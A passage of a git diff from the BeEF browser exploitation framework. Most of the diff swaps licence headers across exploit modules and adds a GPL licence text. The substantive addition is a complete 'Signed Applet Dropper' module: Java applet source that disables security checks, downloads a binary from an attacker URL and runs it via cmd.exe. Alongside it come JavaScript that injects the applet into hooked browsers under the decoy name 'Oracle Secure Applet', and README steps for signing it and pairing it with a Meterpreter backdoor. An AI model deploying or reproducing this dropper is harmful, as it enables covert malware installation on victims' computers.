+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar', '/anti', 'jar')
   end
 
   def self.options
diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
index 758a5dea5..65d91fd55 100644
--- a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var result = "command sent";
diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
index 730bb4c79..5f1cb6d94 100644
--- a/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
index d69389b9f..24bd2ad02 100644
--- a/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # This module is a port of the same module from BeEF-0.4.0.0
 # It has not been tested
diff --git a/modules/exploits/local_host/safari_launch_app/command.js b/modules/exploits/local_host/safari_launch_app/command.js
index 91970c842..80be2851b 100755
--- a/modules/exploits/local_host/safari_launch_app/command.js
+++ b/modules/exploits/local_host/safari_launch_app/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
     var baseTag = document.createElement('base');
     baseTag.setAttribute('id', 'sla_<%= @command_id %>');
diff --git a/modules/exploits/local_host/safari_launch_app/config.yaml b/modules/exploits/local_host/safari_launch_app/config.yaml
index 13200a95d..430662635 100755
--- a/modules/exploits/local_host/safari_launch_app/config.yaml
+++ b/modules/exploits/local_host/safari_launch_app/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/local_host/safari_launch_app/module.rb b/modules/exploits/local_host/safari_launch_app/module.rb
index 50eb85b4a..cde7068cf 100755
--- a/modules/exploits/local_host/safari_launch_app/module.rb
+++ b/modules/exploits/local_host/safari_launch_app/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Safari_launch_app < BeEF::Core::Command
 
diff --git a/modules/exploits/local_host/signed_applet_dropper/README.txt b/modules/exploits/local_host/signed_applet_dropper/README.txt
new file mode 100644
index 000000000..3148891d4
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/README.txt
@@ -0,0 +1,22 @@
+--- How to use this module ---
+-- antisnatchor:
+ - the applet has been compiled with Java 1.6.0 update 0 in order to be compatible with every JRE > 1.6.x (1.7.x included)
+ - tested with IE8 on XP SP3, and IE10 on Win7
+ - tested with JRE 1.6.x and 1.7.x
+
+ - I advise you to recompile/re-sign the applet yourself, the following are the required steps to compile and self-sign the applet.
+NOTE: Best results are obtained signing the applet with a valid Code Signing certificate.
+
+ - Ideally the dropper is a packed backdoor (Meterpreter?) that connects back to your server (for instance a Metasploit multi/handler).
+
+1. compile the two classes
+javac SignedApplet.java SM.java
+
+2. create a JAR
+jar cvf SignedApplet.jar SignedApplet.class SM.class
+
+3. generate a keystore to self-sign the applet
+keytool -keystore tmp -genkey
+
+4. sign the applet
+jarsigner -keystore tmp signedAppletCmdExec.jar mykey
diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SM.class b/modules/exploits/local_host/signed_applet_dropper/applet/SM.class
new file mode 100755
index 000000000..e5e180b79
Binary files /dev/null and b/modules/exploits/local_host/signed_applet_dropper/applet/SM.class differ
diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SM.java b/modules/exploits/local_host/signed_applet_dropper/applet/SM.java
new file mode 100755
index 000000000..14d38bb9d
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/applet/SM.java
@@ -0,0 +1,13 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ *
+ * author: antisnatchor
+*/
+import java.security.*;
+public class SM extends SecurityManager {
+    @Override
+    public void checkPermission(Permission perm) {
+        return;
+    }
+}
\ No newline at end of file
diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class
new file mode 100755
index 000000000..bc6ef79b5
Binary files /dev/null and b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class differ
diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar
new file mode 100755
index 000000000..ee54b1118
Binary files /dev/null and b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar differ
diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java
new file mode 100755
index 000000000..697f5d59b
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java
@@ -0,0 +1,87 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ *
+ * author: antisnatchor
+*/
+import java.applet.*;
+import java.awt.*;
+import java.io.*;
+import java.util.*;
+import java.net.URL;
+
+public class SignedApplet extends Applet {
+
+    public static String debug = "false";
+    public static String bin_url = "";
+    public static String bin_path = "";
+    public static boolean download = false;
+
+    public void init(){
+        bin_url = (String)getParameter("url");
+        String bin_rand_name = Long.toString(Math.abs((new Random()).nextLong()), 36);
+        bin_path = System.getProperty("java.io.tmpdir") + File.separator + bin_rand_name + ".exe";
+
+        // grab operating system -> not used atm
+        // TODO: make the applet compatible also with Linux/OSX
+        String os = System.getProperty("os.name").toLowerCase();
+        execute();
+    }
+
+    public SignedApplet(){
+        super();
+        SecurityManager sm = new SM();
+        System.setSecurityManager(sm);
+        return;
+    }
+
+    public static boolean download(){
+        boolean success = false;
+        try{
+            URL url = new URL(bin_url);
+            InputStream is = url.openStream();
+            BufferedInputStream isbuf = new BufferedInputStream(is);
+            File bin_out = new File(bin_path);
+            OutputStream out = new BufferedOutputStream(new FileOutputStream(bin_out));
+            byte[] buf = new byte[1024];
+            for (;;){
+                int bs = isbuf.read(buf);
+                if (bs <= 0) break;
+                out.write(buf, 0, bs);
+            }
+            out.flush();
+            out.close();
+            is.close();
+            success = true;
+            return success;
+        }catch(Exception e){
+            return success;
+        }
+    }
+
+    public static String execute() {
+        String result = "";
+        String command = "";
+        try{
+            boolean downloadOk = download();
+            System.out.println("Download [" + downloadOk + "] - bin_path [" + bin_path + "]");
+            result = "Download [" + downloadOk + "] - bin_path [" + bin_path + "]";
+
+            if(downloadOk){
+                // TODO: make the applet compatible also with Linux/OSX
+                command = "cmd.exe /c \"" + bin_path + "\"";
+                Process p = Runtime.getRuntime().exec(command);
+                p.waitFor();
+                /// delete dropped binary
+                new File(bin_path).delete();
+                result += "\n\nExecution OK.";
+            }else{
+                //downloading of dropper failed, catch error..
+                result = "Download error.";
+            }
+        }catch (Exception e) {
+            result = "Exception!!!: \n";
+        }
+        return result;
+    }
+}
diff --git a/modules/exploits/local_host/signed_applet_dropper/command.js b/modules/exploits/local_host/signed_applet_dropper/command.js
new file mode 100755
index 000000000..3cd74f3b0
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/command.js
@@ -0,0 +1,28 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+    var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/applet/SignedApplet.jar';
+    var applet_name = '<%= @applet_name %>';
+    var dropper_url = '<%= @dropper_url %>';
+    var ie_only = '<%= @ie_only %>';
+
+    function attach(){
+       beef.dom.attachApplet('signed_applet', applet_name, 'SignedApplet.class',
+         null, applet_archive, [{'url':dropper_url}]);
+
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet added to the DOM.');
+    }
+
+    if(ie_only == "on"){
+       if(beef.browser.isIE()){
+         attach();
+       }
+    }else{
+       attach();
+    }
+});
diff --git a/modules/exploits/local_host/signed_applet_dropper/config.yaml b/modules/exploits/local_host/signed_applet_dropper/config.yaml
new file mode 100755
index 000000000..4110ef9ec
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        signed_applet_dropper:
+            enable: true
+            category: ["Exploits", "Local Host"]
+            name: "Signed Applet Dropper"
+            description: "Injects a Signed Java Applet (compiled with Java 1.6.0 in order to be compatible with every JRE from 1.6.0 to latest 1.7) that downloads a dropper and executes it.
Currently works only on Windows.

Internet Explorer is the only browser that doesn't implement Click to Play for plugins, that's what the IE only checkbox is meant for."
+            authors: ["antisnatchor"]
+            target:
+                user_notify: ["All"]
diff --git a/modules/exploits/local_host/signed_applet_dropper/module.rb b/modules/exploits/local_host/signed_applet_dropper/module.rb
new file mode 100755
index 000000000..1cc350aa5
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Signed_applet_dropper < BeEF::Core::Command
+
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar', '/applet/SignedApplet', 'jar')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SM.class', '/applet/SM', 'class')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class', '/applet/SignedApplet', 'class')
+
+  end
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    return [
+        {'name' => 'dropper_url', 'ui_label' => 'Dropper URL', 'value' => 'http://dropper_url/'},
+        {'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Oracle Secure Applet'},
+        {'name' => 'ie_only', 'ui_label' => 'Internet Explorer only?', 'type' => 'checkbox', 'checked' => 'checked' },
+
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end
diff --git a/modules/exploits/local_host/window_mail_client_dos/command.js b/modules/exploits/local_host/window_mail_client_dos/command.js
index 38eebf375..b908f1f0f 100644
--- a/modules/exploits/local_host/window_mail_client_dos/command.js
+++ b/modules/exploits/local_host/window_mail_client_dos/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	// container iframe
diff --git a/modules/exploits/local_host/window_mail_client_dos/config.yaml b/modules/exploits/local_host/window_mail_client_dos/config.yaml
index 25a643768..898b5183b 100644
--- a/modules/exploits/local_host/window_mail_client_dos/config.yaml
+++ b/modules/exploits/local_host/window_mail_client_dos/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/exploits/local_host/window_mail_client_dos/module.rb b/modules/exploits/local_host/window_mail_client_dos/module.rb
index d752b3e4b..8f311e62b 100644
--- a/modules/exploits/local_host/window_mail_client_dos/module.rb
+++ b/modules/exploits/local_host/window_mail_client_dos/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Windows_mail_client_dos < BeEF::Core::Command
   
diff --git a/modules/exploits/m0n0wall/COPYING.GPL b/modules/exploits/m0n0wall/COPYING.GPL
new file mode 100644
index 000000000..d511905c1
--- /dev/null
+++ b/modules/exploits/m0n0wall/COPYING.GPL
@@ -0,0 +1,339 @@
+		    GNU GENERAL PUBLIC LICENSE
+		       Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+			    Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Lesser General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+		    GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+			    NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+		     END OF TERMS AND CONDITIONS
+
+	    How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+convey the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    
+    Copyright (C)   
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License along
+    with this program; if not, write to the Free Software Foundation, Inc.,
+    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+
+Also add information on how to contact you by electronic and paper mail.
+
+If the program is interactive, make it output a short notice like this
+when it starts in an interactive mode:
+
+    Gnomovision version 69, Copyright (C) year name of author
+    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
